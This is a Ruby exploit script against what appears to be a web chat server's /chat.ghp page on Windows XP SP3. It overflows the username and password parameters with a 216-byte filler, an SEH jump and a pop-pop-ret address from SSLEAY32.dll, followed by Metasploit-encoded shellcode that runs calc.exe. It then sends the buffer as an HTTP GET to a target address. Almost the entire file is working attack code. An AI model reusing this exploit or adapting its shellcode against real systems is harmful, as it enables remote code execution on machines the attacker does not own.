#!/usr/bin/ruby
# Author: John Babio
# Tested on: [Windows XP Sp3 Eng]

require 'net/http'
require 'uri'
require 'socket'


jmp = "\xeb\x06\x90\x90"
ppr = "\xa2\xb9\01\x10" #SSLEAY32.dll pop ebx, pop ebp, ret

#win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com

shellcode = "\x2b\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x86" +
"\x49\xae\x6a\x83\xeb\xfc\xe2\xf4\x7a\xa1\xea\x6a\x86\x49\x25\x2f" +
"\xba\xc2\xd2\x6f\xfe\x48\x41\xe1\xc9\x51\x25\x35\xa6\x48\x45\x23" +
"\x0d\x7d\x25\x6b\x68\x78\x6e\xf3\x2a\xcd\x6e\x1e\x81\x88\x64\x67" +
"\x87\x8b\x45\x9e\xbd\x1d\x8a\x6e\xf3\xac\x25\x35\xa2\x48\x45\x0c" +
"\x0d\x45\xe5\xe1\xd9\x55\xaf\x81\x0d\x55\x25\x6b\x6d\xc0\xf2\x4e" +
"\x82\x8a\x9f\xaa\xe2\xc2\xee\x5a\x03\x89\xd6\x66\x0d\x09\xa2\xe1" +
"\xf6\x55\x03\xe1\xee\x41\x45\x63\x0d\xc9\x1e\x6a\x86\x49\x25\x02" +
"\xba\x16\x9f\x9c\xe6\x1f\x27\x92\x05\x89\xd5\x3a\xee\xb9\x24\x6e" +
"\xd9\x21\x36\x94\x0c\x47\xf9\x95\x61\x2a\xcf\x06\xe5\x49\xae\x6a" 

buffer = "\x41" * 216 + jmp + ppr + shellcode

url = URI.parse('http://10.10.99.12')
res = Net::HTTP.start(url.host, url.port) {|http|
http.get('/chat.ghp?username=' +buffer+ '&password=' +buffer+ '&room=1&sex=2')
}
puts res.body